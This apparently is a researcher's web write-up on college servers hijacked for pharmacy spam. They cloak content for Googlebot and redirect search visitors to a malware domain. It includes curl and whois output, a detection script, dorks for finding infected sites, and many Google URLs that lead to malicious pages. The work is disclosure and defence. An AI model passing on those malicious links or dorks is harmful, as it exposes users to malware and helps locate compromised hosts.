Covert Abuse of College Servers

Directory

1. Executive summary (11-9-13)
2. Detailed analysis (11-9-13)
3. Further analysis of BYU.EDU (11-18-13)
4. Progress at Chatham and BYU (11-19-13)
5. Nineteen More Infected Colleges (11-20-13)
6. 39 More Infected Sites (11-21-13)
7. Eight More Sites (11-21-13)
8. Removal Tips from KWC (11-21-13)
9. Removal Tips from UARK (11-21-13)
10. Conflicting reports about botnet behavior (11-22-13)
11. Finding Local Businesses (11-22-13)
12. Links to helpful resources (11-23-13)
13. UK infected colleges (11-25-13)
14. Misc. infected sites (11-25-13)
15. NZ infected colleges (11-25-13)
16. AU infected colleges (11-25-13)
17. More Notifications (11-25-13)
18. Top "Buy Viagra" Hits (11-27-13)
19. More inside information and Base64-encoded data (11-29-13)
20. More Top Hits (11-30-13)
21. .GOV Sites (12-12-13)


1. Executive Summary

The web server for Kentucky Wesleyan College has been hacked, and has been used for at least the last two weeks to serve malware pages and to sell illegal drugs.

I have not identified the attackers, but they used a domain (SECUREDATA24.COM) registered in Hong Kong and a relay server in Amsterdam, so they seem pretty well-hidden. That domain is not currently on blacklists, but it should certainly be added to them immediately.

This infection is also quite subtle, and would not be easily detected by students or staff of the college. As far as I can tell, the malware is not delivered to people who use the website normally.

However, since the attacker was able to insert malware into several pages at KWC, and to insert a 302 redirect into the Apache configuration, they have a large incident response obligation now.

I highly recommend that KWC hire a security consultant to analyze their systems, to determine how the attack was done, and how much damage was done. They may be subject to legal notification requirements if personal data or health-related information was exposed.

More Infected Servers

Using the same method, I found these other colleges infected the same way. I sent notifications to them on Nov. 10, 2013:

UTS, BYU, TSU, : Still infected 6 pm 11-12-13; still infected 11-14-13
UTS, BYU, TSU, Chatham still infected 11-16-13
KWC: Fixed 6 pm 11-12-13

More notifications:


2. Detailed Analysis

Warning: The pages I am examining here contain malware, so if you try this yourself, be careful!

Google Dorks

I was using Google dorks to find security problems at colleges, and I came across this one:
inurl:edu viagra-online-100mg
As you can see, there are 1.8 million hits:

Dependence on User-Agent

I examined a few of them, finding a variety of exploitation techniques, but this one was different:

Clicking one of the hits in Google redirects to this page:

However, copying and pasting the URL leads to a clean page:

The Google cache shows the defacement:

I changed my User Agent to the Googlebot and saw the same thing.

This is clever, and I imagine it's a good way to persist on a server for a long time. Real links used by students and staff go to clean pages, but people coming in from Google get redirected to malicious sites.

Chrome Developer Tools

Chrome developer tools shows that the page has a 302 redirect right at the start:

Curl

I used this command from the Mac OS X Terminal to fetch the clean page:
curl http://www.kwc.edu > kwc-normal.htm
Here's how that site's source code looks. Notice the small setCookie and getCookie functions:

Then I fetched the infected page:

curl -A "Googlebot/2.1 (+http://www.google.com/bot.html)" http://www.kwc.edu > kwc-google.htm
The dirty one shows the infection in its source code:

I noticed these items:

Mawords Hash

<!-- d90fd6da5bb59c807b28b07724dc0506 -->

This appears to be a hash that identifies the website.

Googling it shows this interesting hit:

I don't know what mawords is, but I decided not to investigate it further right now.

CSS Position

<style>
.8tolyqpt	{
	position:absolute; left:4000px;
}
</style>
This conceals the injected code by placing it 4000 pixels to the right, which I tested using this page:

http://www.w3schools.com/cssref/tryit.asp?filename=trycss_position_relative

However, the way this code is inserted, inside a for loop in a function in the head, I don't think it will ever be rendered.

I think its purpose is to feed the Googlebot keywords about Viagra, so people shopping for Viagra will find this page.
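
The comparison made by hand above (a direct visit, the Googlebot User-Agent, and a click-through from Google) can be checked mechanically. The Python below is an added example, not code from the original page: it flags a conditional off-site 302, keywords served only to some profiles, and the off-screen CSS block. The hostnames, sample responses, keyword list and the use of a Referer header to imitate a Google click-through are assumptions made for the example.

```python
import re
import urllib.error
import urllib.request
from urllib.parse import urlsplit

BROWSER_UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) Chrome/31.0 Safari/537.36"
GOOGLEBOT_UA = "Googlebot/2.1 (+http://www.google.com/bot.html)"  # string used on this page

# Request profiles to compare. The Referer value is an assumption about what
# the infected server keys on when a visitor arrives from a search result.
PROFILES = {
    "direct": {"User-Agent": BROWSER_UA},
    "googlebot": {"User-Agent": GOOGLEBOT_UA},
    "from-google": {"User-Agent": BROWSER_UA, "Referer": "http://www.google.com/"},
}

# The page's "position:absolute; left:4000px" rule, widened to any 4+ digit offset.
OFFSCREEN_CSS = re.compile(r"position\s*:\s*absolute\s*;\s*left\s*:\s*-?\d{4,}px", re.I)
SPAM_WORDS = re.compile(r"\b(viagra|cialis|levitra|pharmacy)\b", re.I)  # assumed list


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # do not follow; the 3xx then surfaces as an HTTPError


def fetch(url, headers):
    """Live fetcher: (status, Location, body), with redirects left unfollowed."""
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, headers=headers), timeout=10) as r:
            return r.status, r.headers.get("Location"), r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location"), ""


def same_site(host_a, host_b):
    """True when one host equals, or is a subdomain of, the other (www. ignored)."""
    a = re.sub(r"^www\.", "", (host_a or "").lower())
    b = re.sub(r"^www\.", "", (host_b or "").lower())
    return a == b or a.endswith("." + b) or b.endswith("." + a)


def compare(url, responses):
    """Return sorted (profile, issue) pairs that differ from the direct visit."""
    site = urlsplit(url).hostname
    _, direct_loc, direct_body = responses["direct"]
    direct_words = {w.lower() for w in SPAM_WORDS.findall(direct_body)}
    found = set()
    for name, (status, location, body) in responses.items():
        if name == "direct":
            continue
        target = urlsplit(location or "").hostname
        # A redirect that leaves the site and that direct visitors do not get.
        if 300 <= status < 400 and target and not same_site(site, target) \
                and location != direct_loc:
            found.add((name, "conditional off-site redirect to " + target))
        new_words = {w.lower() for w in SPAM_WORDS.findall(body)} - direct_words
        if new_words:
            found.add((name, "keywords absent from direct view: " + ",".join(sorted(new_words))))
        if OFFSCREEN_CSS.search(body) and not OFFSCREEN_CSS.search(direct_body):
            found.add((name, "off-screen CSS block"))
    return sorted(found)


def scan(url, fetcher=fetch):
    """Fetch url once per profile and compare the three responses."""
    return compare(url, {name: fetcher(url, hdrs) for name, hdrs in PROFILES.items()})


# Constructed responses modelled on the behaviour described above, not captured traffic.
CLEAN = "<html><head><script>function getCookie(){}</script></head><body>Welcome</body></html>"
CLOAKED = ("<html><head><style>.8tolyqpt { position:absolute; left:4000px; }</style></head>"
           "<body>Welcome <div class='8tolyqpt'>buy viagra online 100mg</div></body></html>")


def fake_infected(url, headers):
    """Stand-in for a compromised server: cloaks for the crawler, redirects search visitors."""
    if "Googlebot" in headers["User-Agent"]:
        return 200, None, CLOAKED
    if "google." in headers.get("Referer", ""):
        return 302, "http://redirect-target.example/landing", ""
    return 200, None, CLEAN


def fake_clean(url, headers):
    """Stand-in for a healthy server: same page for every profile."""
    return 200, None, CLEAN


if __name__ == "__main__":
    for profile, issue in scan("http://www.college.example/", fake_infected):
        print(profile, "->", issue)
```

Calling scan(url) with the default fetcher runs the same comparison against a live server you administer.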

Using Wireshark

I tried to download the page leading to the infection with curl, but was unsuccessful.

And my Avast antivirus was blocking the page now.

So I moved to a Kali Linux virtual machine, turned off Avast, and ran Wireshark while loading the page from the Google hits to get the whole story.

It's very simple. The Google link fetches the KWC page, but the infected server returns a 302 redirect to a securedata24.com link:

I googled that domain, and it is apparently not known as a malware host:

So I turned my antivirus back on and tried to go there, but it seems to have no Website.

Here are some more links showing information about it. It's an 8-month-old domain in Amsterdam that does not seem to have been used to host any real website.

http://domainagecheck.com/domain/securedata24.com

Securedata24.com may not be a known malware host, but it's sure serving up malware now.

Whois shows that it's registered from Hong Kong. Here's the Whois output with everything boring removed.

Notice the email addresses--this looks like an automatically generated domain, to be used temporarily by malware.

$ whois securedata24.com

   Domain Name: SECUREDATA24.COM
   Registrar: ONLINENIC, INC.
   Whois Server: whois.onlinenic.com
   Referral URL: http://www.OnlineNIC.com
   Name Server: NS1.DNS-DIY.NET
   Name Server: NS2.DNS-DIY.NET
   Status: clientTransferProhibited
   Updated Date: 01-apr-2013
   Creation Date: 01-apr-2013
   Expiration Date: 01-apr-2014

Domain Name:securedata24.com
Record created:4/1/2013
Record expired:04/01/2014

Domain servers in listed order:
	 ns1.dns-diy.net 	 ns2.dns-diy.net

Administrat:
   name-- Domain ID Shield Service
   org-- Domain ID Shield Service CO., Limited
   country-- CN
   province-- Hong Kong
   city-- Hong Kong
   address-- Room 510-511A2 Nan Fung Tower., 173 Des Voeux Road C., Hong Kong
   postalcode-- 999077
   telephone-- +852.21581835
   fax-- +852.30197491
   E-mail-- se4944887232201@domainidshield.com
Technical Contact:
   E-mail-- se4944887232202@domainidshield.com
Billing Contact:
   E-mail-- se4944887101103@domainidshield.com
Registrant Contact:
   E-mail-- se4944887101104@domainidshield.com

How Long has KWC Been Infected?

I looked in Google's cache, and I found an infected page from Oct 27, 2013--almost two weeks ago.

Ethics

I decided to notify KWC. I don't see any reason to be secret about it, or to wait for them to fix it.

Their infected servers are being used now to serve malware and sell illegal drugs, and everyone can easily see it on Google searches.

I know from previous experience that some people in the security community will say I am not practicing "responsible disclosure" by publishing this immediately, but I don't agree.

The reasons to delay publication of a security finding are:

What I have here is a vulnerable website that has already been hacked, and which is being used to harm people now.

If KWC fixes it immediately, that's good. But what is the security benefit to anyone in concealing it?

If people think I am wrong, feel free to Tweet me @sambowne

Notification

KWC has no Infosec professors, no Infosec classes, and no contact email at all except admissions@kwc.edu, as far as I can tell.

I also could not find any information on how to report security incidents or how to contact the webmaster.

This situation makes them a logical target for the criminals who are using their systems, and it gives me very little hope that contacting them will do much good.

Nevertheless, I sent this email today, to admissions@kwc.edu, abuse@kwc.edu, and security@kwc.edu.

I also sent it to their Twitter account, which seems active, @kywesleyan.

Hello:

I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.

Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.

To see the infection, simply google "inurl:kwc.edu viagra-online-100mg" (without the quotation marks) and click any link. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.

I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.

Details are here: http://samsclass.info/125/proj11/subtle-infect.htm

Feel free to contact me if I can be of assistance.


3. Further analysis of BYU.EDU

I noticed when attempting to demonstrate the BYU infection that it sometimes fails to appear. Searching for it on my iPad led to links that looked the same, but did not redirect to the malicious sites. At first, I thought this was the malware being even more clever, but I now think it's just a difference in how Google works on iPads.

After several tests, I found a URL that makes analysis easy from any device. This is the URL Google creates when a search is performed in Chrome on a MacBook Air, with all HTTPS protocols replaced by HTTP, to make sniffing easier.

I'm not linking to it, but if you copy and paste this, it works on both the MacBook Air and the iPad:

http://www.google.com/url?sa=t&rct=j&q=inurl%3Abyu.edu%20viagra-online-100mg&source=web&cd=1&ved=0CCsQFjAA&url=http%3A%2F%2Fstore.moa.byu.edu%2Flet-the-children-come-unto-me-4.html%3Fc3rvc%3D484823&ei=3G-KUpaBOqH9iwKns4DABA&usg=AFQjCNHOcrDAehTNn04aaawyLtR74fH0-g&sig2=ILvHfQ3hM5ac5mEzxgXOwA&bvm=bv.56643336,d.cGE
Visiting that link shows this page, a warning from Google:

Here's the TCP conversation from Wireshark.

Clicking the link goes to a malicious site. Here's the important TCP conversation, asking for a page about art on the BYU.EDU server, but returning a 302 redirect to the malicious server securedata24.com:

For future reference, here are handy URLs to use to see the infections at other colleges:

TSU:

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fcost.tsu.edu%2FWebPages%2FNews.php%3FIndex%3D79%26y29zd%3D516464&ei=LoeKUpLWGcipiAKFqYH4Cw&usg=AFQjCNFpEj2OtWBmIffLAlpUmlcz_6VvtA&sig2=jFkx4c8JV4ipWCsboh6P2g&bvm=bv.56643336,d.cGE
UTS:
http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCwQFjAA&url=http%3A%2F%2Fjournals.uts.edu%2Fvolume-x-2009%2F345-heavenly-mother.html%3Fam91c%3D580274&ei=dIeKUuLRA6WUiAL_ioHgCA&usg=AFQjCNFRtTIgxgHX1tzigDQW8KF0K3AAzQ&sig2=uh9NB_CAM6FKzlkNfSmKfQ&bvm=bv.56643336,d.cGE
Here's a link to the simpler infection at Chatham:

http://blogs.chatham.edu/wp-content.bak/plugins/social/OTAwOQ-3D-3D.asp%C3%A2%E2%82%AC%C5%BD

Using them, I verified that all four sites are still infected on 11-18-13.

4. Progress at Chatham and BYU

I found more promising Twitter accounts to use: @BYU, @TexasSouthern, and @UTS_AU_Blog. BYU replied immediately and said they would pass it along to the right people.

Chatham Fixed It!

I just got a friendly email from someone at Chatham (11-19-13), and they deleted the hacked pages. Good to see!

BYU, TSU, and UTS are still infected at 3:13 pm on 11-19-13.

5. Nineteen More Infected Colleges

Update 12-4-13: These are the five colleges that currently have clean servers: @UofAlabama, @UCBerkeley, @WaylandBaptist, @vtnews, @UArkansas.

Repair Timeline

11/20/13 6:00 am: All 19 infected
11/20/13 2:10 pm: 7 cleaned, 12 still infected
11/21/13 3:50 pm: 5 cleaned, 14 still infected (3 cleaned changed to infected, one infected changed to cleaned)
12/2/13 6:00 am: 6 cleaned, 13 still infected
12/4/13 6:12 am: 5 cleaned, 14 still infected

Interesting cases

KWC: 6 of the first ten hits for "site:kwc.edu buy viagra" are still infected. The original reported link was fixed but came back.

DAVIDSON: 9 of the first ten hits for "site:DAVIDSON.EDU online canadian pharmacy" are infected. The original reported link was fixed but came back.

UCSC: All of the first ten hits for "site:ucsc.edu viagra" are infected. The reported link was fixed, but came back the next day. Santa Cruz is nearby--I'd love to visit and see this thing from the inside. I want to find the best way to clean it, and get malware samples so we can recognize it and get it added to antivirus databases, if appropriate.

NCSU: 9 of the first ten hits for "site:ncsu.edu drug prices" are infected. The reported link was fixed, but came back the next day.

12-4-13 6:12 am testing; all unchanged except 16 is now re-infected

I used this Google search:

inurl:edu intitle:viagra
Here are the colleges that were infected, as of 9 am 11-20-13, with URLs that go to malicious pages (don't load them on an unprotected system).

Some of these are duplicates of infections I found previously, but I decided to include them all and try again to notify them, since clearly nothing has yet been fixed.

Infected on 11-29-13:
http://ot.ncsu.edu/in-usa-levitra-generic/

College Emails Malicious URL
1. UA.EDU
Alabama
@UofAlabama
community.affairs@ua.edu
dlamb@fa.ua.edu
mbownes@uasystem.ua.edu
pdunn@uasystem.ua.edu

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

dateline.ua.edu/viagra-online-san-marino
2. KWC.EDU
Kentucky
debbiebe@kwc.edu
kpayne@kwc.edu
admissions@kwc.edu
krutherman@kwc.edu
jkuhlman@kwc.edu

Fixed when tested on 11-21-13
Infected again 12-2-13
Fixed on 7-19-14

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFEQFjADOAo&url=http%3A%2F%2Fwww.kwc.edu%2Fpage.php%3Fpage%3D1135%26a3djl%3D983496&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEiL4qQXQCr2r1e3A_WyyBLyQd_oA&sig2=NZKJE8w7An68ASRJ1c5oOw&bvm=bv.56643336,d.cGE
3. WWW.COLBYCC.EDU
Kansas
george.mcnulty@colbycc.edu
pat.erickson@colbycc.edu
gregory.nichols@colbycc.edu
debbie.schwanke@colbycc.edu

Still infected on 11-21-13 & 12-2-13
Fixed on 7-19-14

http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CFoQFjAEOAo&url=http%3A%2F%2Fwww.colbycc.edu%2F%3Fy29sy%3D393622&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEMa4eororLMbHVZWEEDXbEuRtL6w&sig2=KAmjrkyaLDsx4kbYnVhnxA&bvm=bv.56643336,d.cGE
4. PARSONS.EDU
New York
BrinkmaG@newschool.edu
ByfieldT@newschool.edu
chacina@newschool.edu
thinkparsons@newschool.edu
thinkparsonsgrad@newschool.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CHMQFjAHOAo&url=http%3A%2F%2Fpetlab.parsons.edu%2Famd%2Ftop-selling-herbal-viagra%2F&ei=FuyMUs_TB9HyigLA-YCIBg&usg=AFQjCNEy90ifx_7mMfJ8-33q1BtvsgMIlw&sig2=GsyEvUhGOgLBmOjkRet1Rg&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CC0QFjAC&url=http%3A%2F%2Fwnsr.parsons.edu%2F%3Fzti%3D92-kamagra%2Ba%2Bviagra&ei=InzKU8abGIa-sQTVxIHIDw&usg=AFQjCNGW-0kATQ4oouMWjJsdIzHjforOkw&sig2=IoKpU7newDY1mNjtUSC5YQ

5. BERKELEY.EDU
California
@UCBerkeley
andypino@berkeley.edu
rsanders@berkeley.edu
CHANCELLOR@BERKELEY.EDU
AUDIT@BERKELEY.EDU

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fchl.berkeley.edu%2F2010%2F7%2Fpost2614%2Fgenerika-viagra-cialis&ei=h-6MUs2HMeWJiALw54GYBA&usg=AFQjCNHcFI6QMWqu9HavksN9ZJxDX2XxSw&sig2=AY8Em7IGIrVOcovf31xXgA&bvm=bv.56643336,d.cGE
6. DAVIDSON.EDU
North Carolina
president@davidson.edu
raramanujan@davidson.edu
tichartier@davidson.edu
edkania@davidson.edu

Fixed at 2:10 PM 11-20-13!

Infected again on 11-21-13; still infected 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEwQFjAEOB4&url=http%3A%2F%2Fdavidsonjournal.davidson.edu%2Findex.php%2Forder-discount-viagra-online%2F&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNFDRXMeEhVChigdkrC195RjUjoqDA&sig2=pXpBFiT855lPJlspneGhag&bvm=bv.56643336,d.cGE
7. WCU.EDU
North Carolina
webmaster@wcu.edu
wkbrenton@wcu.edu
lgaetano@email.wcu.edu
cfowler@email.wcu.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGwQFjAIOB4&url=http%3A%2F%2Fsandbox.wcu.edu%2Fthisweek%2Fincludes%2Finc.php%3Fp%3Dcialis-viagra-combination&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNEW9BZ2mWPOB43LBWF4OuL21Jsn2Q&sig2=MXCEs5aOsizDlC4mgDcXtQ&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CB8QFjAA&url=http%3A%2F%2Fdoitnews.wcu.edu%2Fviagra-saw%2F&ei=wHzKU5KMAq7lsASYrID4DA&usg=AFQjCNEzTdSjHdgT7GyXNkzJ8OspRF9xJw&sig2=nhB2S1bQP-oydGE7A824Fg

8. UTS.EDU
New York
None

Still infected on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHMQFjAJOB4&url=http%3A%2F%2Fwww.journals.uts.edu%2Fvolume-vi-2004-2005%2F%3Fam91c%3D262389&ei=6-6MUvvoM6O1iwLC6IEI&usg=AFQjCNGcE9zwkt03RPPgYdeHQGowq9Fwwg&sig2=0Y4BGf3Oo6bE59dziYdZKQ&bvm=bv.56643336,d.cGE
9. TSU.EDU
Texas
rudleyjm@TSU.EDU
Griffin_ka@TSU.EDU
yu_lx@tsu.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=41&ved=0CCsQFjAAOCg&url=http%3A%2F%2Ftransportation.tsu.edu%2FTrans_Server%2FCTTR4TransportationServ%2Fwww.tsu.edu%2Fcore%2Fmanager%2Fpagemgrcontrolled%2Fpagepreviewa1b5.html%3Fdhjhb%3D659796&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEzQ1LWShwoZdS9bWWrBCI2rqY_mA&sig2=UAXm8ivGAqOeLck7qOub6w&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCcQFjAB&url=http%3A%2F%2Ftransportation.tsu.edu%2Fonline-viagra%2F&ei=RH3KU5uLJ9PmsASNyIC4BQ&usg=AFQjCNESVgwE_-0xUdp745WpN5WWg7bvJw&sig2=NieSm9AXMYXXoUo7mRpmaA

10. WWCC.EDU
Washington
steven.vanausdle@wwcc.edu
i.ramsey@wwcc.edu
wendy.samitore@wwcc.edu
webmaster@wwcc.edu
general@wwcc.edu

Still infected on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=42&ved=0CDMQFjABOCg&url=http%3A%2F%2Fwww.wwcc.edu%2FCMS%2F%3Fid%3D835%26d3djy%3D424667&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNH3lPzl2i_UxOxJ-KX8GLlFD3ehOg&sig2=eLp2d_CKlugzm2AKKNkf5Q&bvm=bv.56643336,d.cGE
11. NMSU.EDU
New Mexico
ckottong@nmsu.edu
audit@nmsu.edu
ovprweb@nmsu.edu
hamid@nmsu.edu
abuse@nmsu.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=43&ved=0CD8QFjACOCg&url=http%3A%2F%2Fchss.nmsu.edu%2Fprospective-students%2Fvisit-our-college%2F%3Fy2hzc%3D725794&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNFx77pUP7lp83FUoOcRg7vO9gaivA&sig2=kyQaW-1TG4jdFlvHqmVkDA&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEQQFjAE&url=http%3A%2F%2Fwww.cs.nmsu.edu%2FALP%2F%3Fsildenafil-order&ei=oX3KU5arL8fksASbu4H4Cw&usg=AFQjCNFxCe5vfg5TgvR1Wc0s0TsmCv7I1Q&sig2=JLSO_XrLX_tj8Ozo1okrQA

12. WBU.EDU
Texas
@WaylandBaptist
webmaster@wbu.edu
armesp@wbu.edu
lezlieh@wbu.edu
vhart@wbu.edu

Still infected on 11-21-13
Fixed 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=44&ved=0CEcQFjADOCg&url=http%3A%2F%2Fwww.wbu.edu%2Flog%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNGa6pq_p4K5RnHVlADKZZ7_MmlB4Q&sig2=duTiMSV_HHvyn4jOZQmzGw&bvm=bv.56643336,d.cGE
13. UCSC.EDU
California
help@ucsc.edu
chancellor@ucsc.edu
mdoyle1@ucsc.edu
yiz@soe.ucsc.edu

Fixed at 2:10 PM 11-20-13!

Infected again on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CE4QFjAEOCg&url=http%3A%2F%2Fpromweek.soe.ucsc.edu%2F%3Fp%3D1594&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNE10sG-np9zjvxKNCwSuoYSum43RQ&sig2=CJ2ShwPqc65tupSuhtP9hQ&bvm=bv.56643336,d.cGE
14. VT.EDU
Virginia Tech
@vtnews
president@vt.edu
rittenfa@vt.edu
gscales@vt.edu
lhaugh@vt.edu

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=49&ved=0CGwQFjAIOCg&url=http%3A%2F%2Fdendro.cnre.vt.edu%2Fdoctor%2Fgeneric-viagra-india%2F&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNG7gtb95z5zjjqG4gpnKRW3M_2pDw&sig2=kEw8sKJTDhFvTQsJ0UNy-Q&bvm=bv.56643336,d.cGE
15. UARK.EDU
Arkansas
@UArkansas
chancell@uark.edu
rhudson@uark.edu
dandrews@uark.edu
sleeds@uark.edu

Fixed at 2:10 PM 11-20-13!

Fixed when tested on 11-21-13 & 12-2-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=50&ved=0CHMQFjAJOCg&url=http%3A%2F%2Frgis.cast.uark.edu%2Findex.php%3Fq%3Dviagra-ghana&ei=2O-MUsWEEKHviQLf9ICwBA&usg=AFQjCNEOAX85AJw40JaupfamewRUHoR4LA&sig2=iQHQE1WuAXjzQ-RBe2RgUA&bvm=bv.56643336,d.cGE
16. SFASU.EDU
Texas
jstandley@sfasu.edu
liasrr@sfasu.edu
taylorj1@sfasu.edu
jljohnstone@sfasu.edu
controller@sfasu.edu

Still infected on 11-21-13
Fixed 12-2-13
Re-infected 12-4-13; still infected on 7-19-14

cte.sfasu.edu/course/?pitemx=473

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CDIQFjAA&url=http%3A%2F%2Fforestry.sfasu.edu%2Findex.php%3Fnew%3D197909%26luom%3D2825%3Ftitle%3Dpriser-viagra&ei=KX7KU5_GK_PfsATV1YDoCg&usg=AFQjCNGd5ZjDsGaLkc6h0Ud3PyKpRSfeLA&sig2=w-m86ofnvUD8JAqSSjyUNw

17. ISI.EDU
California
pnataraj@isi.edu
jtw@isi.edu
carl@isi.edu
vcomms@usc.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=66&ved=0CFYQFjAFODw&url=http%3A%2F%2Fwww.lsi.edu%2Fblog%2Fwp-content%2Fuploads%2F2008%2F10%2F%3Fvan%3Dads-for-viagra%26go%3D1&ei=TPGMUvSkMOTEigL24AE&usg=AFQjCNHvVBr3jM59GoRyzIhoUOcDEr4oNw&sig2=6jR-t1WaK5VKg9lmrCy9lQ&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=21&ved=0CDoQFjAAOBQ&url=http%3A%2F%2Fdiw.isi.edu%2Fdis2012&ei=cH7KU7W3C4_nsATF9oCQDQ&usg=AFQjCNGv6b5EfQzCPrgAARB3pYsqyb54WQ&sig2=3RzDLbc2Z2JegjLbQeo0VA

18. NCSU.EDU
North Carolina
web_feedback@ncsu.edu
newstips@ncsu.edu
eileen_goldgeier@ncsu.edu
academic-student-affairs@ncsu.edu

Fixed at 2:10 PM 11-20-13!

Infected again on 11-21-13 & 12-2-13
Fixed on 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=88&ved=0CGAQFjAHOFA&url=http%3A%2F%2Femporium1.lib.ncsu.edu%2Fwolfram%2Fsounds%2F_css2.php%3Fp%3Dbuy-viagra-cialis-online&ei=jPGMUsgnqseKAuzQgIgM&usg=AFQjCNHsel9r1jcvxLie5H9cwISnUcbnFg&sig2=bgjyKXmv9HMPAq8jSaD2pg&bvm=bv.56643336,d.cGE
19. PARKLAND.EDU
Illinois
ABlackman@parkland.edu
MMobasseri@parkland.edu
admissions@parkland.edu
businessoffice@parkland.edu
plehn@parkland.edu

Still infected on 11-21-13 & 12-2-13 & 7-19-14

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=92&ved=0CDEQFjABOFo&url=http%3A%2F%2Fvirtual.parkland.edu%2Flanguages%2Findex.php%3Fidpost%3D3762%26join%3Dvendo-viagra-alicante&ei=HvKMUpnkFMn8iwLH7ID4Cw&usg=AFQjCNHGjmguu4NdSLeJLdcQoIVzVQk-XA&sig2=luLY594arg4CrcL2sKNbTQ&bvm=bv.56643336,d.cGE

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CCQQFjAB&url=http%3A%2F%2Fvirtual.parkland.edu%2Flanguages%2Findex.php%3Fidpost%3D2912&ei=UX_KU8DdEsrfsATW8ICoBA&usg=AFQjCNFASVuiVRGIWWVc7fNvSpSfp8MvOA&sig2=srCjn2s9faX5mYXKPGTXIw

Today, 11-20-13, I sent notices as listed above, like this:

Subject: You have been hacked

Hello:

I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.

Your web server has been hacked, and is being used to sell illegal drugs and to deliver malware.

To see the infection, open the link below. I recommend using a Mac or Linux machine to perform this test because the pages that open contain malware.

I strongly recommend that you alert your webmaster, and engage the services of a web security consultant. There is quite a lot of work to be done to repair the damage, fix the vulnerabilities that caused this, and determine if your students or staff have been harmed.

Details are here: http://samsclass.info/125/proj11/subtle-infect.htm

Feel free to contact me if I can be of assistance.


6. 39 More Infected Sites

I used these Google searches:
inurl:gov intitle:viagra
inurl:bank intitle:viagra
inurl:school intitle:viagra
intitle:news intitle:viagra intitle:sale
"viagra" intitle:Canadian "state college"
"viagra" intitle:Canadian "state university"
"viagra" intitle:Canadian intitle:"school of"
"viagra" intitle:Canadian intitle:"representative"
intitle:viagra intitle:Canadian council
inurl:school viagra canadian
intitle:viagra intitle:canadian Website designed and maintained by Fifth Ape Design
Since I got helpful responses from two of the colleges I notified yesterday, I changed my notification policy. I only notified the big-name schools on this list, hoping to get more good security researchers to join in so we can work together and figure this thing out. Hopefully we can post information that will be helpful to the smaller schools and organizations that have been hacked.

So I notified these schools this morning:

4. MIT.EDU
13. UCSC.EDU (the worst infection I have seen, apparently 2000 infected pages)
